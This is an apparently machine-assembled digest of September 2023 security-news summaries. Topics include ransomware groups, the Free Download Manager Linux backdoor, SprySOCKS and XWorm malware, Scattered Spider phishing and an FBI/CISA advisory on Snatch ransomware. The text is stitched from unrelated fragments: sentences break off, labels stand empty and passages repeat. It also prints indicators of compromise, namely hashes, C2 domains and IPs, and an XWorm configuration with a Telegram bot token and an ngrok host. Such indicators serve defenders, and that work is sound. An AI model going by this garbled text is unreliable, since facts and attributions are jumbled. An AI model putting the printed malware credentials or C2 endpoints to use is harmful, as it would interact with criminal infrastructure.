Data Breach Investigation Costs Investigating a data breach involves a resource-intensive combination of technical, administrative, legal, and communication activities, which together prove rather pricey for companies. Here are some suggestions for preventing data breaches in the first place: Robust Information Governance Information governance defines and enforces policies, procedures, standards, and controls around the management of data. Our in-house team of analysts use 13+ years of historical threat data along with continuously trawling the open, deep, and dark web to discover customer-specific threat information.Each year, IBM’s eagerly anticipated Cost of a Data Breach Report seems to come with the bad news of an increase in data breach costs, and 2023 is no exception. "McAfee launched McAfee Scam Protection to address the rise in AI-generated phishing scams. The latest feature in McAfee’s product suite draws on patented AI technology to turn the tables on cybercriminals using AI to turbocharge scams and deceive people out of thousands of dollars. With the help of AI, cybercriminals are creating more convincing, personalized scams, at scale. Phishing scams are the number one cybersecurity threat worldwide, with a new phishing site created every 11 … More
The post McAfee Scam Protection blocks fake emails, texts, and social media links appeared first on Help Net Security.
"Autosummary:
It’s why we all need the most advanced, innovative AI working in our favor, to proactively protect us, in real-time, before we even know we’ve been targeted,” said Greg Johnson, McAfee Chief Executive Officer. "NordVPN launched its first experimental project under the NordLabs platform. The AI-enabled browser extension Sonar aims to help internet users detect phishing emails and protect themselves from cybercrimes. “AI tools have facilitated the automation of a significant portion of phishing attacks, and it is anticipated that the frequency of such attacks will escalate in the future, posing a significant cybersecurity threat. With this new release we aim to fight fire with fire. Sonar is based … More
The post NordVPN Sonar helps internet users detect phishing emails appeared first on Help Net Security.
"Autosummary:
Last week, NordVPN launched NordLabs – a platform to explore emerging technologies, such as AI, and create new tools and services to ensure the security and privacy of internet users. "Autosummary:
Cado Security researchers who have been following the botnet since late July 2023, report today seeing global activity, with most breaches impacting systems in China, the United States, Germany, Singapore, Hong Kong, the UK, and Japan. "Autosummary:
"Categories: News Categories: Ransomware More DoppelPaymer ransomware group suspects have been identified by blockchain investigations and had search warrants executed against them. |
The post DoppelPaymer ransomware group suspects identified appeared first on Malwarebytes Labs.
"Autosummary:
Other victims attacked by DoppelPaymer in the past include Compal, PEMEX (Petróleos Mexicanos), the City of Torrance in California, Newcastle University, Hall County in Georgia, Banijay Group SAS, and Bretagne Télécom. In March of 2023, we reported how the German Regional Police and the Ukrainian National Police, with support from Europol, the Dutch Police, and the United States Federal Bureau of Investigations (FBI), apprehended two suspects and seized computer equipment.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "Autosummary:
"Autosummary:
"China-linked threat actor Earth Lusca used a new Linux malware dubbed SprySOCKS in a recent cyber espionage campaign. Researchers from Trend Micro, while monitoring the activity of the China-linked threat actor Earth Lusca, discovered an encrypted file hosted on a server under the control of the group. Additional analysis led to the discovery of a […]
The post Earth Lusca expands its arsenal with SprySOCKS Linux malware appeared first on Security Affairs.
"Autosummary:
The group is targeting public-facing servers attempting to exploit server-based N-day vulnerabilities, including: : Vulnerability Description CVE-2022-40684 An authentication bypass vulnerability in Fortinet FortiOS, FortiProxy and FortiSwitchManager CVE-2022-39952 An unauthenticated remote code execution (RCE) vulnerability in Fortinet FortiNAC CVE-2021-22205 An unauthenticated RCE vulnerability in GitLab CE/EE CVE-2019-18935 An unauthenticated remote code execution vulnerability in Progress Telerik UI for ASP.NET AJAX CVE-2019-9670 / CVE-2019-9621 A bundle of two vulnerabilities for unauthenticated RCE in Zimbra Collaboration Suite ProxyShell (CVE-2021-34473, CVE-2021-34523v, CVE-2021-31207) The malware supports multiple commands, including collecting system information, starting an interactive shell, listing network connections, creating SOCKS proxy, uploading and downloading files, and other basic file operations (listing, deleting, renaming, and creating a directory). "NightDragon announced a new strategic partnership with CyberKnight to continue the international expansion capabilities of its portfolio companies and bring the latest CSSP innovations to customers in the Middle East, Turkey, Africa (META) and other regions. CyberKnight has rapidly grown into the largest pure-play cybersecurity VAD in the Middle East in just under four years. Through its strategic partner channel, it helps more than 500 enterprise and government customers implement leading solutions to simplify breach … More
The post NightDragon and CyberKnight strengthen cybersecurity in the Middle East, Turkey and Africa appeared first on Help Net Security.
"Autosummary:
Through its strategic partner channel, it helps more than 500 enterprise and government customers implement leading solutions to simplify breach detection, prevention, and incident response, as well as implement regulatory compliance, zero trust practices, critical infrastructure protection, artificial intelligence (AI), threat intelligence, and more. "Autosummary:
An alternate infection vector is a Microsoft Office document named "Overview_of_UWCs_UkraineInNATO_campaign.docx," which exploits CVE-2017-11882, a six-year-old memory corruption vulnerability in Microsoft Office"s Equation Editor, to invoke a Dropbox URL hosting a different MSI file serving a variant of the same Rust backdoor. "Autosummary:
Infection sequences start with the exploitation of known security flaws in public-facing Fortinet (CVE-2022-39952 and CVE-2022-40684), GitLab (CVE-2021-22205), Microsoft Exchange Server (ProxyShell), Progress Telerik UI (CVE-2019-18935), and Zimbra (CVE-2019-9621 and CVE-2019-9670) servers to drop web shells and deliver Cobalt Strike for lateral movement. "Autosummary:
"Autosummary:
"Autosummary:
URLs HTTPSnoop is configured to listen for (Cisco) PipeSnoop Cisco first spotted the PipeSnoop implant in May 2023, acting as a backdoor that executes shellcode payloads on breached endpoints through Windows IPC (Inter-Process Communication) pipes. "Autosummary:
"Autosummary:
ARC-Authentication-Results: i=1; mx.google.com; dkim=pass header.i=@stretto.com header.s=s1 header.b=xx; spf=pass (google.com: domain of bounces+xxx-xxx-xx=xxx.com@em6462.stretto.com designates 149.72.171.199 as permitted sender) smtp.mailfrom="bounces+xxx-xxx-xx=xxx.com@em6462.stretto.com"; dmarc=pass (p=QUARANTINE sp=QUARANTINE dis=NONE) header.from=stretto.com A recipient of one of these phishing emails told BleepingComputer that they did not have an account at Celsius and never filed as a creditor, making it strange that they received this email. "Categories: News Tags: Free Download Manager Tags: Linux Tags: Debian Tags: crond Tags: reverse shell After three years of delivering malware to selected visitors, Free Download Manager was alerted to the fact that its website had been compromised. |
The post Compromised Free Download Manager website was delivering malware for years appeared first on Malwarebytes Labs.
"Autosummary:
Browser Guard blocks fdmpkg.org Indicators of Compromise (IOCs): File hashes (SHA-256): b77f63f14d0b2bde3f4f62f4323aad87194da11d71c117a487e18ff3f2cd468d 2214c7a0256f07ce7b7aab8f61ef9cbaff10a456c8b9f2a97d8f713abd660349 93358bfb6ee0caced889e94cd82f6f417965087203ca9a5fce8dc7f6e1b8a3ea d73be6e13732d365412d71791e5eb1096c7bb13d6f7fd533d8c04392ca0b69b5 File locations: /etc/cron.d/collect /var/tmp/crond /var/tmp/bs /var/tmp/atd IP and domain: 172.111.48.101 fdmpkg.org Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. "Autosummary:
"Autosummary:
XWorm"s Tactics, Techniques, and Procedures (TTPs) The sandbox report highlighted several techniques used by the sample: Figure 3: XWorm"s activities on the infected system. Host 6[.]tcp.eu.ngrok[.]io Port 13394 AES key Slaves!-.;!2Swezy999!(xxx Splitter Xwormmm Sleep time 3 USB drop file USB.exe Mutex Lz8qftMH08V7f1rq Log file %temp%\\Log.tmp Telegram token 6674821695:AAExQsr6_hmXk6hz7CN4kMSi9cs9y86daYM Telegram chat id 5865520781 Conclusion Obtaining configurations of the latest malware is crucial but time-consuming. XWorm"s failed attempt to evade sandbox analysis Since the initial analysis report was several days old, the team decided to run the sample through the sandbox once again to check for new activities. From there, the only logical step for the team was to open the file in dnSpy, a .NET debugger, which promptly revealed that the binary was subject to heavy obfuscation. "Autosummary:
" The group, also known by the names 0ktapus, Scatter Swine, and Scattered Spider, has been active since early 2022, adopting phone-based social engineering and SMS-based phishing to obtain employees" valid credentials using bogus sign-in pages and infiltrate victim organizations, mirroring tactics adopted by another group called LAPSUS$. While the group originally focused on telecom and business process outsourcing (BPO) companies, it has since expanded its targeting to include hospitality, retail, media and entertainment, and financial services, illustrative of the growing threat. "Today, Dragos revealed that it has secured a $74 million Series D extension funding round, spearheaded by the strategic operating and investment firm WestCap. The funding extension comes when global governments and infrastructure providers increasingly acknowledge the critical role of industrial cybersecurity, necessitating enhanced focus on their ICS/OT settings. In an interview with Help Net Security, Darren Sankbeil, CFO of Dragos, discusses the significance of this investment for the firm amid the rising urgency to … More
The post Industrial cybersecurity giant Dragos rakes in new funding, sets sights on global expansion appeared first on Help Net Security.
"Autosummary:
In addition to our historically strong presence in the Electric, Oil & Gas, Water, and Federal Government sectors, we are seeing the Manufacturing, Food and Beverage, and Technology sectors increase in prominence as a percentage of our business. The Dragos Platform is technology built for practitioners by practitioners that arms industrial cybersecurity teams with the most up-to-date defensive tools, codified by our experts on the front lines every day hunting, combatting, and responding to advanced ICS threats.We launched the Dragos Global Partner Program this year, the only channel program to comprise OT cybersecurity technology, services, and threat intelligence as well as training. "Autosummary:
Supercharge Your Skills "Based on analysis of suspected UNC3944 phishing domains, it is plausible that the threat actors have, in some cases, used access to victim environments to obtain information about internal systems and leveraged that information to facilitate more tailored phishing campaigns," Mandiant disclosed last week. "Three high-severity Kubernetes vulnerabilities (CVE-2023-3676, CVE-2023-3893, CVE-2023-3955) could allow attackers to execute code remotely and gain control over all Windows nodes in the Kubernetes cluster. About the vulnerabilities CVE-2023-3676, discovered by Akamai researcher Tomer Peled, is a command injection vulnerability that can be exploited by applying a malicious YAML file on the cluster. “The Kubernetes framework uses YAML files for basically everything — from configuring the Container Network Interface to pod management and even secret … More
The post Kubernetes vulnerability allows RCE on Windows endpoints (CVE-2023-3676) appeared first on Help Net Security.
"Autosummary:
Three high-severity Kubernetes vulnerabilities (CVE-2023-3676, CVE-2023-3893, CVE-2023-3955) could allow attackers to execute code remotely and gain control over all Windows nodes in the Kubernetes cluster. "Autosummary:
"Once the malware has infected the victim"s machine, it can steal a wide range of sensitive information, including contacts, SMS messages, call logs, images, audio files, screen recordings, and screenshots. A majority of Hook and ERMAC"s command-and-control (C2) servers are located in Russia, followed by the Netherlands, the U.K., the U.S., Germany, France, Korea, and Japan. "Software development company Retool was the victim of a smishing attack that resulted in the compromise of 27 accounts of its cloud customers. Software development company Retool revealed that 27 accounts of its cloud customers were compromised as a result of an SMS-based social engineering attack. The company states that one of its employees was […]
The post Deepfake and smishing. How hackers compromised the accounts of 27 Retool customers in the crypto industry appeared first on Security Affairs.
"Autosummary:
But through this Google update, what was previously multi-factor-authentication had silently (to administrators) become single-factor-authentication, because control of the Okta account led to control of the Google account, which led to control of all OTPs stored in Google Authenticator.How hackers compromised the accounts of 27 Retool customers in the crypto industry Pierluigi Paganini September 18, 2023 September 18, 2023 Software development company Retool was the victim of a smishing attack that resulted in the compromise of 27 accounts of its cloud customers. "Autosummary:
Here, too, Intel471 spotted several variations of the command set, from mounting the file copies, extracting, and executing the files from the mounted drive, which is another indication of trial for optimization. "Autosummary:
The main backdoor functionalities of this novel malware include: Collecting system information collection (OS details, memory, IP address, group name, language, CPU), starting an interactive shell that uses the PTY subsystem, listing network connections, managing SOCKS proxy configurations, and performing basic file operations (uploading, downloading, listing, deleting, renaming, and creating directories.) "SentiLink launched Facets, a new intelligent attributes solution that enables U.S. financial institutions to improve fraud models and implement more sophisticated onboarding flows. The solution provides feature-specific intelligence derived from SentiLink’s proprietary identity data and from its broad consortium of leading banks, credit unions and fintechs. This new tool allows SentiLink’s partners to improve their models and accelerate how they make risk-based decisions. As financial fraud techniques become more sophisticated and complex, financial institutions are … More
The post SentiLink unveils Facets to improve financial fraud detection appeared first on Help Net Security.
"Autosummary:
Augment decisioning data – facets enhances financial institutions’ in-house fraud models with flexible, intelligent data points for targeting the nuances of fraud in their application population and creating more actionable insights that fraud teams can leverage to make data-driven decisions. "The head of Germany’s foreign intelligence service warns of state-sponsored attacks aimed at liquefied natural gas (LNG) terminals in the country. Bruno Kahl, the President of the Bundesnachrichtendienst intelligence service since 2016, warned of state-sponsored attacks aimed at liquefied natural gas (LNG) terminals in the country. After the Russian invasion of Ukraine, the German government […]
The post German intelligence warns cyberattacks could target liquefied natural gas (LNG) terminals appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
"Categories: Business Malwarebytes is the only vendor recognized as “Easiest to Use” with the “Easiest Admin” for its EDR and MDR solutions in the recent G2 Fall 2023 results. |
The post Malwarebytes named leader across six endpoint security categories, marking its ease of use, in G2 Fall 2023 results appeared first on Malwarebytes Labs.
"Autosummary:
#1 overall Usability index, underscoring Malwarebytes’ commitment to building effective solutions that are easy to deploy, use, and manage Badges: Most Implementable, Easiest Setup, Best Results, Easiest to Use, Easiest Admin, Best Usability In the Managed Detection and Response (MDR) category: The Malwarebytes MDR solution provides 24x7 threat monitoring and investigations without the expense of building and running a SOC in-house.Dennis Davis, IT Systems Manager, Drummond Experience Malwarebytes for Business: Award-winning ROI, user-friendly, and effective threat defense Malwarebytes provides IT staff with award-winning business solutions, offering unmatched threat protection, a lightning-fast return on investment, and a smooth, speedy implementation. "Categories: Exploits and vulnerabilities Categories: News Tags: theme Tags: themepack Tags: Microsoft Tags: cve-2023-38146 Tags: msstyles An exploit has been released for a vulnerability in .themes that was patched in the September 2023 Patch Tuesday update. |
The post ThemeBleed exploit is another reason to patch Windows quickly appeared first on Malwarebytes Labs.
"Autosummary:
Microsoft assigned a CVSS score of 8.8 (out of 10) and gave it a severity rating “Important”, saying: “An attacker would need to convince a targeted user to load a Windows Themes file on a vulnerable system with access to an attacker-controlled SMB share.” The .theme files contain references to .msstyles files, which should contain no code, only graphical resources that are loaded when the theme file invoking them is opened. "Categories: Business Tags: MGM Resorts Tags: hotel Tags: casino Tags: ransomware Tags: blackcap Tags: ALPHV We take a look at a ransomware group"s claims that they were the ones responsible for the MGM Resorts attack. |
The post Ransomware group steps up, issues statement over MGM Resorts compromise appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. It begins: Statement on MGM Resorts International: Setting the record straight 9/14/2023, 7:46:49 PM We have made multiple attempts to reach out to MGM Resorts International, "MGM". There are also claims that the attackers still have access to the MGM Resorts network, despite the shutdown and clean up operation taking place: The ALPHV ransomware group has not before privately or publicly claimed responsibility for an attack before this point.They don’t just use password reset impersonation, but also phishing, SIM swapping (hijacking someone’s mobile number), and even MFA fatigue where your mission is to annoy an employee with so many alerts that they eventually say “yes”. "Autosummary:
What to expect Nailing the interview will likely require a combination of technical knowledge, problem-solving skills, and the ability to effectively communicate your expertise.An interview with someone senior in the company, possibly even a C-level executive, will come last, and is the time to prove you’re the right cultural fit and that you’re hungry for the role. 10 top tips for interview success ) Do your research This might sound obvious, but the first step is to understand the company you’re applying to join.You may want to tailor your preparation to the specific role you"re applying for, whether it"s a security analyst, penetration tester, or security engineer. "Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known ransomware IOCs and TTPs associated with the Snatch ransomware variant identified through FBI investigations as recently as June 1, 2023.
Since mid-2021, Snatch threat actors have consistently evolved their tactics to take advantage of current trends in the cybercriminal space and leveraged successes of other ransomware variants’ operations. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB), Food and Agriculture, and Information Technology sectors. Snatch threat actors conduct ransomware operations involving data exfiltration and double extortion. After data exfiltration often involving direct communications with victims demanding ransom, Snatch threat actors may threaten victims with double extortion, where the victims’ data will be posted on Snatch’s extortion blog if the ransom goes unpaid.
FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report:
Autosummary: (Incorrect file location, should be C:\Windows\System32\svchost.exe) Mutexes Created Mutexes Created \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-fc_key \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-sjlj_once \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-use_fc_key gcc-shmem-tdm2-fc_key gcc-hmem-tdm2-sjlj_once gcc-shmem-tdm2-use_fc_key MITRE ATT&CK TACTICS AND TECHNIQUES See Tables 4-16 for all referenced threat actor tactics and techniques in this advisory. In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). Registry Keys Registry Keys HKLM\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Servers\D8B548F0-E306-4B2B-BD82-25DAC3208786\FriendlyName HKU\S-1-5-21-4270068108-2931534202-3907561125-1001\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{ED50FC29-B964- 48A9-AFB3-15EBB9B97F36} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF System Log Changes Source Message TerminalServices-RemoteConnectionManager Remote session from client name exceeded the maximum allowed failed logon attempts. REPORTING The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from IP addresses, a sample ransom note, communications with Snatch threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA.In August 2023, individuals claiming to be associated with the blog gave a media interview claiming the blog was not associated with Snatch ransomware and “none of our targets has been attacked by Ransomware Snatch…”, despite multiple confirmed Snatch victims’ data appearing on the blog alongside victims associated with other ransomware groups, notably Nokoyawa and Conti.[1] Initial Access and Persistence Snatch threat actors employ several different methods to gain access to and maintain persistence on a victim’s network.Within this timeframe, Snatch threat actors exploited the victim’s network [T1590], moving laterally across the victim’s network with RDP [T1021.001] for the largest possible deployment of ransomware and searching for files and folders [T1005] for data exfiltration [TA0010] followed by file encryption [T1486]. to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).Snatch threat actors use sc.exe to configure, query, stop, start, delete, and add system services using the Windows Command line. Download the PDF version of this report: For a downloadable copy of IOCs, see: TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13.The authoring agencies recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices for hardening software against ransomware attacks (e.g., to prevent threat actors from using Safe Mode to evade detection and file encryption), thus strengthening the secure posture for their customers.Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, a local FBI Field Office, or to CISA at report@cisa.gov or (888) 282-0870. VALIDATE SECURITY CONTROLS In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization"s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. Table 11: Snatch Threat Actors ATT&CK Techniques for Enterprise – Discovery Technique Title ID Use Query Registry T1012 Snatch threat actors may interact with the Windows Registry to gather information about the system, configuration, and installed software. "
Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: The blueprint for a highly effective EASM solution In this Help Net Security interview, Adrien Petit, CEO at Uncovery, discusses the benefits that organizations can derive from implementing external attack surface management (EASM) solutions, the essential capabilities an EASM solution should possess, and how it deals with uncovering hidden systems. How should SMBs navigate the phishing minefield? In this Help … More
The post Week in review: 17 free AWS cybersecurity courses, exploited Chrome zero-day appeared first on Help Net Security.
"Autosummary:
Bruschetta-Board: Multi-protocol Swiss Army knife for hardware hackers Bruschetta-Board is a device for all hardware hackers looking for a fairly-priced all-in-one debugger and programmer that supports UART, JTAG, I2C & SPI protocols and allows to interact with different targets’ voltages (i.e., 1.8, 2.5, 3.3 and 5 Volts!).Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: The blueprint for a highly effective EASM solution In this Help Net Security interview, Adrien Petit, CEO at Uncovery, discusses the benefits that organizations can derive from implementing external attack surface management (EASM) solutions, the essential capabilities an EASM solution should possess, and how it deals with uncovering hidden systems. "Autosummary:
Therefore, it is essential to recognize that almost every crypto giveaway site is a scam, especially those claiming to be from Elon Musk, Tesla, SpaceX, Ark Invest, Gemini, and high-profile exchanges and celebrities that promise massive returns. "Autosummary:
For instance, in a new extortion approach last summer, the ransomware gang used a dedicated clear web website to leak the stolen data of a specific victim, providing the victim"s customers and employees with the means to determine whether their data had been exposed. "Autosummary:
"Drivers using the identified ELDs may continue to record their hours of service on a paper graph grid or logging software, in accordance with § 395.8, until ORBCOMM notifies FMCSA that the malfunctioning Blue Tree ELDs have resumed service or by September 29, 2023, whichever occurs first," explains the FMCSA. "Autosummary:
Finally, some interesting research was released this week: Contributors and those who provided new ransomware information and stories this week include: @Seifreed, @malwareforme, @serghei, @malwrhunterteam, @BleepinComputer, @demonslay335, @Ionut_Ilascu, @LawrenceAbrams, @billtoulas, @vxunderground, @BroadcomSW, @MsftSecIntel, @AlvieriD, @WilliamTurton, @GeeksCyber, @pcrisk, and @Mandiant. September 11th 2023 MGM Resorts International disclosed today that it is dealing with a cybersecurity issue that impacted some of its systems, including its main website, online reservations, and in-casino services, like ATMs, slot machines, and credit card machines. "Categories: News Categories: Ransomware Tags: Europol Tags: Phishing Tags: RDP Tags: VPN Tags: Exchange Tags: LOTL Tags: BEC Tags: ransomware Tags: IAB Tags: crypter Tags: Flubot A Europol report discusses developments in cyberattacks, new methodologies, and threats as observed by Europol’s operational analysts. |
The post Europol lifts the lid on cybercrime tactics appeared first on Malwarebytes Labs.
"Autosummary:
The most common service providers for ransomware groups include initial access brokers (IABs), crypter developers, droppers-as-a-service, money laundering, and bullet-proof hosting services.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. These groups work closely with other malware-as-a-service groups to compromise high-revenue targets and post huge ransom demands, running into millions of Euros. "64% of IT leaders believe that cybersecurity concerns are negatively impacting their organization’s willingness to invest in innovative tech, according to a report by HPE Aruba Networking. This is perhaps unsurprising as 91% either consider emerging tech a danger or admit to having already experienced a breach because of it. But this comes at a time when IT leaders must be empowered to embrace innovation such as generative AI to accelerate business-critical transformation – something … More
The post Cybersecurity risks dampen corporate enthusiasm for tech investments appeared first on Help Net Security.
"Autosummary:
And IT leaders are investing accordingly – organizations are starting to press ahead with network-based security solutions including, Security Service Edge (SSE) or similar edge-to-cloud security (89%), policy-based network access control (88%), and Secure Access Service Edge (SASE) security (87%). "Autosummary:
Process flow, demonstrating scanning, compromising, infecting and joining a new device to a botnet Advanced botnets can self-propagate, compromising more devices autonomously, bringing more and more devices into the botnet, expanding the botnet"s size and amplifying the scale of future attacks.Controlled by attackers, botnets can scale and rapidly execute various attacks, including DDoS, data theft, ad fraud, cryptocurrency mining, spam and phishing, data harvesting, and snooping—without device owners" knowledge.This broad category of devices includes sensors, cameras, network routers, and advanced machinery, and their integration into everyday life and work processes results in an ecosystem that can automate operations, improve decision-making, and enhance user experience. Incorporating IoT Devices into Botnets IoT devices that are unpatched, unattended, or misconfigured, or are already under botnet DDoS attack, are at risk of being incorporated into a botnet. Initiatives like the Cyber Threat Alliance and the Joint Cyber Defense Collaborative unite governments, tech companies, and cybersecurity firms to rapidly detect and neutralize emerging threats, strengthening collective global defenses. "Autosummary:
"Compared to earlier variants, the new NodeStealer variant uses batch files to download and run Python scripts, and steal credentials and cookies from multiple browsers and for multiple websites," Michael said. "Autosummary:
"Because the ads look so legitimate, there is little doubt people will click on them and visit unsafe sites," Jérôme Segura, director of threat intelligence at Malwarebytes, said. "Autosummary:
Peach Sandstorm, also known by the names APT33, Elfin, and Refined Kitten, has been linked to spear-phishing attacks against aerospace and energy sectors in the past, some of which have entailed the use of the SHAPESHIFT wiper malware. "The Russian national Dariy Pankov, aka dpxaker, has pleaded guilty to conspiracy to commit wire and computer fraud. The Russian national Dariy Pankov (28), aka dpxaker, is the author of the NLBrute malware. The man has been extradited to the United States from Georgia. In February 2023, Pankov was charged with conspiracy, access device fraud, […]
The post Dariy Pankov, the NLBrute malware author, pleads guilty appeared first on Security Affairs.
"Autosummary:
Dariy Pankov, the NLBrute malware author, pleads guilty Pierluigi Paganini September 15, 2023 September 15, 2023 The Russian national Dariy Pankov, aka dpxaker, has pleaded guilty to conspiracy to commit wire and computer fraud. "Researchers discovered a free download manager site that has been compromised to serve Linux malware to users for more than three years. Researchers from Kaspersky discovered a free download manager site that has been compromised to serve Linux malware. While investigating a set of suspicious domains, the experts identified that the domain in question has […]
The post Free Download Manager backdoored to serve Linux malware for more than 3 years appeared first on Security Affairs.
"Autosummary:
The information stealer can collect multiple data such, including system information, browsing history, saved passwords, cryptocurrency wallet files, as well as credentials for cloud services (AWS, Google Cloud, Oracle Cloud Infrastructure, Azure).“We observed the following actions that happen in all these videos: The video makers opened the legitimate website of Free Download Manager (freedownloadmanager[.]org) in the browser; website of Free Download Manager (freedownloadmanager[.]org) in the browser; They afterwards clicked on the Download button for the Linux version of the software; They were redirected to the malicious https://deb.fdmpkg[.]org/freedownloadmanager.deb URL that hosts the infected version of Free Download Manager.” "Autosummary:
"Categories: Personal Tags: apple Tags: wanderlust Tags: cryptocurrency Tags: event Tags: BTC Tags: ETH Tags: fake We take a look at a cryptocurrency scam riding on the coat tails of the Apple Wonderlust event. |
The post iPhone 15 launch: Wonderlust scammers rear their heads appeared first on Malwarebytes Labs.
"Autosummary:
The site continues: To participate you just need to send from 0.1 BTC to 50 BTC to the contribution address and we will immediately send you back 0.2 BTC to 100 BTC (x2) to the address you sent it from.Posted: September 14, 2023 by We take a look at a cryptocurrency scam riding on the coat tails of the Apple Wonderlust event. "Autosummary:
The researcher also notes that downloading a theme file from the web triggers the "mark-of-the-web" warning, which could alert the user of the threat. "Autosummary:
In late August, the Metropolitan Police (Met) published a similar announcement about hackers gaining access to the IT system of one of its suppliers, resulting in the exposure of names, ranks, photos, vetting levels, and pay numbers for 47,000 police officers and staff. "Autosummary:
If the visitor is one the threat actors wish to target, they will be redirected to a malware-dropping site at "webexadvertisingoffer[.]com," while all others will be redirected to Cisco"s legitimate "webex.com" site. "Autosummary:
- AT According to the latest update published earlier today, the following AT services have been impacted as a result of the attack: Online top-ups, as well as other AT HOP services using MyAT HOP on the AT website. "Autosummary:
Link between Lapsus$ and UNC3944 source: Mandiant A Scattered Spider campaign called "0ktapus" was used to target over 130 organizations to steal Okta identity credentials and 2FA codes, with some of those targets including T-Mobile, MetroPCS, Verizon Wireless, AT&T, Slack, Twitter, Binance, KuCoin, CoinBase, Microsoft, Epic Games, Riot Games, Evernote, AT&T, HubSpot, TTEC, and Best Buy. Once they gain access to admin credentials, they can perform further attacks, such as hijacking single sign-on administration, destroying backups, and, more recently, deploying the BlackCat/ALPHV ransomware to encrypt devices. "Categories: Business Dive into where we prevented more than the rest and how we were able to do it. |
The post Malwarebytes wins every Q2 MRG Effitas award & scores 100% on new phishing test appeared first on Malwarebytes Labs.
"Autosummary:
MRG Effitas assesses a product"s ability to meet today’s most pressing threats, including stopping zero-day malware, ransomware, exploits, and more—and doing so with speedy performance and low false positives. Nebula view of detected ransomware activity 100% of banking malware blocked We were one of the few vendors who earned a 360° Online Banking Certification, which means Malwarebytes EP stopped 100% of threats designed to steal financial information and money from victim"s accounts. "Autosummary:
Link between Lapsus$ and UNC3944 source: Mandiant A Scattered Spider campaign called "0ktapus" was used to target over 130 organizations to steal Okta identity credentials and 2FA codes, with some of those targets including T-Mobile, MetroPCS, Verizon Wireless, AT&T, Slack, Twitter, Binance, KuCoin, CoinBase, Microsoft, Epic Games, Riot Games, Evernote, AT&T, HubSpot, TTEC, and Best Buy. Once they gain access to admin credentials, they can perform further attacks, such as hijacking single sign-on administration, destroying backups, and, more recently, deploying the BlackCat/ALPHV ransomware to encrypt devices. "Autosummary:
Once in place, the Pegasus spyware can spy on SMS messages Emails Photos and videos Contacts WhatsApp communications Calendars Calls Chats GPS location data Microphone and camera "Autosummary:
"Autosummary:
The Debian package contains a post-install script that"s executed upon its installation to drop two ELF files, /var/tmp/bs and a DNS-based backdoor (/var/tmp/crond) that launches a reverse shell to a command-and-control (C2) server, which is received in response to a DNS request to one of the four domains - 2c9bf1811ff428ef9ec999cc7544b43950947b0f.u.fdmpkg[.]org c6d76b1748b67fbc21ab493281dd1c7a558e3047.u.fdmpkg[.]org 0727bedf5c1f85f58337798a63812aa986448473.u.fdmpkg[.]org c3a05f0dac05669765800471abc1fdaba15e3360.u.fdmpkg[.]org "The communication protocol is, depending on the connection type, either SSL or TCP," the researchers said. "Autosummary:
Tracked as CVE-2023-27470 (CVSS score: 8.8), the issue relates to a Time-of-Check to Time-of-Use (TOCTOU) race condition vulnerability, which, when successfully exploited, could be leveraged to delete arbitrary files on a Windows system. "Autosummary:
Supercharge Your Skills The Committee to Protect Journalists (CPJ) said "journalists and their sources are not free and safe if they are spied on, and this attack on Timchenko underscores that governments must implement an immediate moratorium on the development, sale, and use of spyware technologies. "LockBit ransomware group breached two hospitals, the Carthage Area Hospital and the Clayton-Hepburn Medical Center in New York. The Lockbit ransomware group claims to have hacked two major hospitals, the Carthage Area Hospital and Claxton-Hepburn Medical Center. The two hospitals serve hundreds of thousands of people in upstate New York. The cyberattack took place at […]
The post Lockbit ransomware gang hit the Carthage Area Hospital and the Clayton-Hepburn Medical Center in New York appeared first on Security Affairs.
"Autosummary:
